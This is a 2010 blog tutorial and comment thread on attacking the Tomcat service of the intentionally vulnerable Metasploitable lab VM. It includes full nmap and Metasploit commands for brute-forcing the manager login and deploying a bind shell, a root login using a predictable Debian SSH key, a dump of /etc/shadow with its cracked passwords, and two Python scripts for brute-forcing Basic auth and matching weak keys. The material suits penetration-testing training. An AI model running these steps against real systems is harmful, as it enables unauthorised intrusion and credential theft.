2010-07-01

[Video] Metasploitable - Tomcat

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3826187
Download video: http://www.mediafire.com/?wv748u6o2jabdsw
Download usernames.lst: http://www.mediafire.com/?j02jnj3gnx5
Download passwords.lst: http://www.mediafire.com/?z5imdtojgnw
Download (debian_ssh_rsa_2048_x86.tar.bz2): http://www.mediafire.com/?i2mnwymzt51


What is this?
This video demonstrates an attack on the Tomcat service on the Metasploitable hackable box: weak Tomcat manager credentials give a low-privilege shell, and a predictable Debian SSH key found in that shell gives root.

"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com

"Apache Tomcat is an open source software implementation of the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process." - tomcat.apache.org


Guide
> Use Nmap to scan the network (gathering information)
> Use Nmap to do a more detailed scan of the target (gathering information)
> Use Metasploit to brute force the login (gaining access)
> Use Metasploit to send a payload (remote access)
> *I cheated a little bit here as I had used nessus in a previous scan to discover "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"*
> Via the payload it is possible to capture the SSH Key and compare it against the weak keys *Just like pWnOS* (escalating privileges)
> Connect via SSH as root (complete access)
> Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)


What do I need?

> Nmap --- on Backtrack 4 (Final)
> Metasploit --- on Backtrack 4 (Final)
> SSH --- on Backtrack 4 (Final)
> John The Ripper --- on BackTrack!
> Dictionaries/Word-lists --- Usernames Passwords
> Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) --- http://www.mediafire.com/?i2mnwymzt51
> Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
> Metasploitable.part01.rar ~ http://www.mediafire.com/?dy2jl2wmw5h (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
> Metasploitable.part02.rar ~ http://www.mediafire.com/?3zrz2wjmjmz (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
> Metasploitable.part03.rar ~ http://www.mediafire.com/?nmjmyimmqwm (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
> Metasploitable.part04.rar ~ http://www.mediafire.com/?gdjyzfjyjzm (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)

 
Commands:
# On BackTrack 4: find the target, then fingerprint its services (Tomcat is on port 8180 on Metasploitable)
nmap 192.168.1.1-255
nmap -sV -sS -O -f -n 192.168.1.105
firefox 192.168.1.105
# In msfconsole: brute force the Tomcat manager login, then deploy a payload with the recovered credentials
msfconsole
search tomcat
use scanner/http/tomcat_mgr_login
show options
setg RHOSTS 192.168.1.105
setg RPORT 8180
set USER_FILE /root/usernames.lst
set PASS_FILE /root/passwords.lst
exploit
use multi/http/tomcat_mgr_deploy
show options
setg USERNAME tomcat
setg PASSWORD tomcat
show payloads
set payload generic/shell_bind_tcp
show options
exploit
# In the low-privilege shell on Metasploitable: look for root's SSH public key
ls
whoami
hostname
ls -lart /root
ls -lart /root/.ssh
cat /root/.ssh/authorized_keys
# Back on BackTrack: fetch the pre-generated weak Debian keys and find the .pub whose blob matches authorized_keys
firefox -> www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
# Log in as root with the matching private key (same file name as the .pub hit, minus the extension)
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
whoami
hostname
ifconfig
cat /etc/shadow
# Back on BackTrack: save the shadow file and crack it (john needs the saved file as its target)
kate -> Paste -> Save (Filename: /root/shadow)
john
./john --rules --wordlist=/pentest/passwords/wordlists/darkc0de.lst /root/shadow
ssh msfadmin@192.168.1.105
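The brute-force stage above (scanner/http/tomcat_mgr_login) is, at the HTTP level, nothing more than repeated GETs of the manager page with a Basic auth header until one answers 200 instead of 401. The script below is an added example written for this page, not code from the video or from Metasploit, and it has to run offline: it starts a constructed stand-in for the Tomcat 5.5 manager that only accepts tomcat:tomcat, then walks a small constructed user/password list against it. The manager path /manager/html and the 401 + WWW-Authenticate behaviour are how Tomcat's manager answers; the realm string, the loopback port and the word lists are assumptions standing in for usernames.lst and passwords.lst.

```python
import base64
import threading
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer
from itertools import product

MANAGER_PATH = "/manager/html"                              # Tomcat manager web interface
REALM = 'Basic realm="Tomcat Manager Application"'          # realm text is an assumption

# CONSTRUCTED stand-in for the target: the only account it knows is the weak
# default the video recovers (tomcat:tomcat).
FAKE_MANAGER_CREDS = {"tomcat": "tomcat"}


class FakeManagerHandler(BaseHTTPRequestHandler):
    """Answers like a manager app protected by HTTP Basic auth."""

    def do_GET(self):
        if self.path != MANAGER_PATH:
            self.send_response(404)
            self.end_headers()
            return
        if self._authorised():
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(b"<html>Tomcat Web Application Manager</html>")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", REALM)
            self.end_headers()

    def _authorised(self):
        header = self.headers.get("Authorization", "")
        if not header.startswith("Basic "):
            return False
        try:
            user, _, password = base64.b64decode(header[6:]).decode().partition(":")
        except ValueError:          # bad base64 or bad UTF-8 both end up here
            return False
        return FAKE_MANAGER_CREDS.get(user) == password

    def log_message(self, *_):      # keep the stand-in quiet
        pass


def start_fake_manager():
    """Bind the stand-in to a free loopback port; returns (server, port)."""
    server = HTTPServer(("127.0.0.1", 0), FakeManagerHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def try_login(host, port, user, password, timeout=5):
    """One Basic-auth attempt; only an HTTP 200 counts as a valid login."""
    conn = HTTPConnection(host, port, timeout=timeout)
    try:
        token = base64.b64encode(f"{user}:{password}".encode()).decode()
        conn.request("GET", MANAGER_PATH, headers={"Authorization": "Basic " + token})
        return conn.getresponse().status == 200
    finally:
        conn.close()


def brute_force(host, port, users, passwords):
    """Walk every user x password pair, as the module does with USER_FILE x PASS_FILE; stop on first hit."""
    for user, password in product(users, passwords):
        if try_login(host, port, user, password):
            return user, password
    return None


if __name__ == "__main__":
    server, port = start_fake_manager()
    users = ["admin", "manager", "tomcat"]          # constructed, in place of usernames.lst
    passwords = ["admin", "password", "tomcat"]     # constructed, in place of passwords.lst
    print(brute_force("127.0.0.1", port, users, passwords))   # ('tomcat', 'tomcat')
    server.shutdown()
```

Pointed at a real lab box, the same `brute_force` call with host 192.168.1.105 and port 8180 does what the video's `exploit` line does, one request per pair; the stand-in only exists so the logic can be exercised without a Metasploitable VM. If the 401 keeps coming back for tomcat:tomcat, check the path first: the manager lives at /manager/html, and a 404 there means the wrong port or a Tomcat without the manager app, not wrong credentials.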



------------------------------------------------------------------------------------
Cracked (user:password) = /etc/shadow entry
root:             = root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
sys:batman        = sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
klog:123456789    = klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
msfadmin:msfadmin = msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
postgres:postgres = postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
user:user         = user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:service   = service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
------------------------------------------------------------------------------------

Notes:

Song: Underworld - Cowgirl
Video length: 7:07
Capture length: 11:17

Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-tomcat.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30078-%5Bvideo%5D-metasploitable-tomcat.html#post167042



~g0tmi1k

17 comments:

  1. Thx for this great Tutorial.

    I still get
    "Exploit completed, but no session was created."
    when i try to exploit.
    I've tried most of the Payloads, all with the same error.
    Any suggestions?

  2. @jpg
    I'm not 100% sure why.
    Did you try generic/shell_bind_tcp?
    What version are you running? What is your setup?
    What happens if you "cheat" that stage? Can you still do the other stages afterwards?

  3. @g0tm1lk
    I'm using the newest version of Metasploit (v3.4.2).
    generic/shell_bind_tcp didn't work, and neither did
    generic/shell_reverse_tcp
    linux/x86/shell/bind_tcp
    linux/x86/shell_bind_tcp and a few other linux payloads including meterpreter

    My Setup: Backtrack 4 R1 and Metasploitable in VirtualBox in virtuallan-mode, both with static IPs. I don't think it depends on that; everything except the exploiting works

  4. @jpg
    Can you login using "tomcat", "tomcat"?

  5. This comment has been removed by the author.

  6. On Metasploitable it isn't possible to login as "tomcat"; the user is called "www-data".
    But msfadmin:msfadmin certainly works.
    The Tomcat web interface works and I can login to that with tomcat:tomcat.

    I thought that somebody might have a clue why my exploiting doesn't work.
    Although I cheated a little so I could continue without using the tomcat-exploit to finish the pentest.

  7. @jpg
    Which bit fails?
    scanner/http/tomcat_mgr_login
    *** OR ****
    multi/http/tomcat_mgr_deploy

  8. Sorry, I didn't mention that. The "tomcat_mgr_deploy" didn't work for me. Sure it's not your fault, your method seems to work for some people :)
    So if anybody who watches this vid has the same problem and has a clue, please post it here.

  9. @jpg use payload linux/x86/shell_bind_tcp instead of the generic one.

  10. @jpg
    I hope you have it working by now *as it's been a while ;)*
    I'm not sure why it's not working for you.
    Have you tried any other attack points?


    @Casey
    Thanks for the tip!
    However, it's the scanning part that is failing, not the exploit. jpg is (or was?) unable to get the correct login details.

  11. hey guys,
    thx for the support.

    Last time I tried it I couldn't get it working. But it was only for an essay and playing around with some tools, so I've no reason to do it again.

    so thx again!

  12. @jpg
    That must have been some essay! I wish my school had let me do things like that. Hope you got a good grade on it, sorry we didn't get it working for you in time.

  13. Thank you, great tutorial g0tmi1k. I've a short question.

    I couldn't understand the logic behind getting the auth_key and comparing it with deb_ssh_rsa_2048.
    Can this be applied for every kind of situation, or was it possible because there was some kind of weakness in the auth_keys, or the ssh version itself?
    If it's a general approach, we could just brute-force every ssh server with the keys in deb_ssh_rsa_2048, right?

  14. @g0tmi1k
    I'm not a regular blogger user, so I thought I may have to do the [at]username thing so you receive my post above

  15. @Tyler
    The logic behind getting the "auth_key" and comparing it with "deb_ssh_rsa_2048" is:
    "authorized_keys" has the public key in it - AAAAB3NzaC....

    By searching, the attacker can match up the same public key that was generated by the Debian OpenSSL weakness file(s) - "57c3115d77c56390332dc5c49978627a-5429.pub"

    The attacker found the public key name. Because the public and private key are "linked" and because of the weakness, they also have the private key.

    The attacker then just uses the private key to connect back - without ever knowing what the password was.


    There WAS a weakness: "the debian openssl issue means there are only 65,536 possible ssh
    keys generated". The issue was how the SSH keys were generated. After the patch, when the keys are generated, it creates a lot more possibilities which makes it A LOT harder to predict the key. Because there are more keys, deb_ssh_rsa_2048 will not work.


    I do "[at] username", to show who I am addressing as sometimes I reply to a couple of people in one post.
    As I haven't left a comment other than on my own blog - I do not know how the replying system works!
    *It's different for me, as I am the owner of this blog =P*

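The matching step the reply above describes (and the `grep -lr ... *.pub` in the Commands list does by hand), written out as an added example for this page rather than code from the post: read authorized_keys, index every `.pub` in the weak-key pack by its base64 blob, and report the private key that sits next to each hit. The only real data is the public-key blob from the post's grep line; the pack directory, its decoy keys and the placeholder private-key files are constructed so the script runs offline. It assumes the pack's layout of `<name>.pub` beside a private key `<name>`, which is what the post's `ssh -i 57c3115d77c56390332dc5c49978627a-5429` line shows.

```python
import base64
import hashlib
import os
import tempfile

# The public-key blob root's authorized_keys held on Metasploitable, copied from
# the grep command in the post; every other key and file below is constructed.
TARGET_BLOB = (
    "AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+"
    "WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8"
    "wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoX"
    "fdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w"
)

KEY_TYPES = ("ssh-rsa", "ssh-dss")   # the key types the Debian weak-key packs were generated for


def parse_authorized_keys(text):
    """Return (key_type, blob, comment) per key line; skips blanks, comments and leading options."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        for i, tok in enumerate(tokens):          # options (command=..., from=...) may precede the type
            if tok in KEY_TYPES and i + 1 < len(tokens):
                entries.append((tok, tokens[i + 1], " ".join(tokens[i + 2:])))
                break
    return entries


def index_weak_keys(weak_dir):
    """Map each public blob in the pack to the path of its private key (same name minus .pub)."""
    index = {}
    for dirpath, _, filenames in os.walk(weak_dir):
        for name in filenames:
            if not name.endswith(".pub"):
                continue
            pub_path = os.path.join(dirpath, name)
            with open(pub_path) as fh:
                tokens = fh.read().split()
            if len(tokens) >= 2 and tokens[0] in KEY_TYPES:
                index[tokens[1]] = pub_path[:-4]
    return index


def fingerprint(blob):
    """MD5 fingerprint of a public key blob (colon-separated hex, the 2010-era ssh-keygen -l form)."""
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))   # tolerate blobs copied without '=' padding
    digest = hashlib.md5(raw).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, 32, 2))


def find_weak_keys(authorized_keys_text, weak_dir):
    """Return [(comment, fingerprint, private_key_path)] for every authorized key present in the pack."""
    index = index_weak_keys(weak_dir)
    return [(comment, fingerprint(blob), index[blob])
            for _, blob, comment in parse_authorized_keys(authorized_keys_text)
            if blob in index]


def build_sample_weak_dir():
    """CONSTRUCTED stand-in for rsa/2048 from the pack: two decoy keys plus the one that
    matches root's key on Metasploitable. Private-key bodies are placeholders, not key material."""
    root = tempfile.mkdtemp(prefix="weak_rsa_2048_")
    pack = {
        "0123456789abcdef0123456789abcdef-1": "AAAAB3NzaC1yc2EAAAABIwAAAQEAdecoy0001",   # constructed
        "fedcba9876543210fedcba9876543210-2": "AAAAB3NzaC1yc2EAAAABIwAAAQEAdecoy0002",   # constructed
        "57c3115d77c56390332dc5c49978627a-5429": TARGET_BLOB,   # the pack file name the video used
    }
    for name, blob in pack.items():
        with open(os.path.join(root, name + ".pub"), "w") as fh:
            fh.write(f"ssh-rsa {blob} root@constructed\n")
        with open(os.path.join(root, name), "w") as fh:
            fh.write("-----BEGIN RSA PRIVATE KEY-----\nCONSTRUCTED PLACEHOLDER\n-----END RSA PRIVATE KEY-----\n")
    return root


if __name__ == "__main__":
    weak_dir = build_sample_weak_dir()
    authorized_keys = f"ssh-rsa {TARGET_BLOB} root@metasploitable\n"   # constructed copy of the file the shell read
    for comment, fp, key_path in find_weak_keys(authorized_keys, weak_dir):
        print(f"{comment}: weak key {fp} -> ssh -i {key_path} root@192.168.1.105")
```

Run against the real pack, the same call takes the output of `cat /root/.ssh/authorized_keys` and the extracted rsa/2048 directory, and the path it prints is exactly the `ssh -i` argument the video uses. The defender's version of this check is the same lookup from the other side: Debian shipped `ssh-vulnkey` for it, and any key in the pack that turns up in an authorized_keys file should be treated as already public and replaced, not just removed from that one host.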
  16. Thank you g0tmi1k.
    I appreciate the detailed answer. Thank you for explaining it in detail, it's now clear for me.
    Cheers

  17. @Tyler
    You're welcome!
    Best of luck!
